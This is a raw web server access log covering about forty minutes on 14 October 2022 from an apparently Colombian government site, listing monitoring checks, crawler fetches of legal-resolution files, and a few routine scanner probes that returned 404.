172.22.2.4 - - [14/Oct/2022:03:59:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:04:00:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
216.245.221.92 - - [14/Oct/2022:04:02:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:04:02:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
185.119.81.103 - - [14/Oct/2022:04:05:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [14/Oct/2022:04:05:34 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [14/Oct/2022:04:05:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2022:04:07:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:04:07:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:04:06:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
66.249.73.127 - - [14/Oct/2022:04:08:27 -0500] "-" 408 -
173.252.83.116 - - [14/Oct/2022:04:11:52 -0500] "-" 408 -
216.245.221.92 - - [14/Oct/2022:04:12:22 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.190 - - [14/Oct/2022:04:12:46 -0500] "GET /BLA/resoluciones/00001783.tif HTTP/1.1" 404 1018
201.245.192.253 - - [14/Oct/2022:04:12:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:04:11:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:04:12:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
157.55.39.154 - - [14/Oct/2022:04:15:46 -0500] "GET / HTTP/1.1" 200 319
173.252.107.20 - - [14/Oct/2022:04:15:54 -0500] "GET /images/bogota-economia-circular-7-febrero.jpg HTTP/1.1" 200 51473
216.245.221.92 - - [14/Oct/2022:04:17:22 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [14/Oct/2022:04:17:40 -0500] "-" 408 -
207.46.13.89 - - [14/Oct/2022:04:17:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001780.tif HTTP/1.1" 200 305582
201.245.192.253 - - [14/Oct/2022:04:17:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
172.22.2.4 - - [14/Oct/2022:04:17:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:04:17:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
178.79.182.99 - - [14/Oct/2022:04:21:11 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [14/Oct/2022:04:22:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43710
201.245.192.253 - - [14/Oct/2022:04:22:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42980
216.245.221.92 - - [14/Oct/2022:04:22:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:04:22:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
66.249.73.127 - - [14/Oct/2022:04:23:19 -0500] "-" 408 -
172.22.2.4 - - [14/Oct/2022:04:22:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
43.140.203.111 - - [14/Oct/2022:04:24:35 -0500] "GET /manager/html HTTP/1.1" 404 1018
172.22.2.4 - - [14/Oct/2022:04:24:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
172.22.2.4 - - [14/Oct/2022:04:23:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44471
172.22.2.4 - - [14/Oct/2022:04:23:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44896
216.245.221.92 - - [14/Oct/2022:04:27:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:04:27:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
157.55.39.202 - - [14/Oct/2022:04:29:45 -0500] "GET /BLA/resoluciones/00001753.tif HTTP/1.1" 404 1018
201.244.247.215 - - [14/Oct/2022:04:29:55 -0500] "GET /la-secretaria-de-ambiente-abre-nueva-convocatoria-para-su-programa-de-voluntariado-ambiental.html HTTP/1.1" 200 976
83.143.86.62 - - [14/Oct/2022:04:30:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.73.127 - - [14/Oct/2022:04:30:08 -0500] "-" 408 -
172.22.2.4 - - [14/Oct/2022:04:28:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:04:29:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
152.89.196.211 - - [14/Oct/2022:04:31:57 -0500] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 1018
201.245.192.253 - - [14/Oct/2022:04:32:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43710
201.245.192.253 - - [14/Oct/2022:04:32:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42980
216.245.221.92 - - [14/Oct/2022:04:32:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2022:04:32:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43432
201.76.5.16 - - [14/Oct/2022:04:33:33 -0500] "GET / HTTP/1.1" 200 319
66.249.73.127 - - [14/Oct/2022:04:36:00 -0500] "-" 408 -
172.22.2.4 - - [14/Oct/2022:04:34:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2022:04:35:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [14/Oct/2022:04:37:22 -0500] "HEAD / HTTP/1.1" 200 -
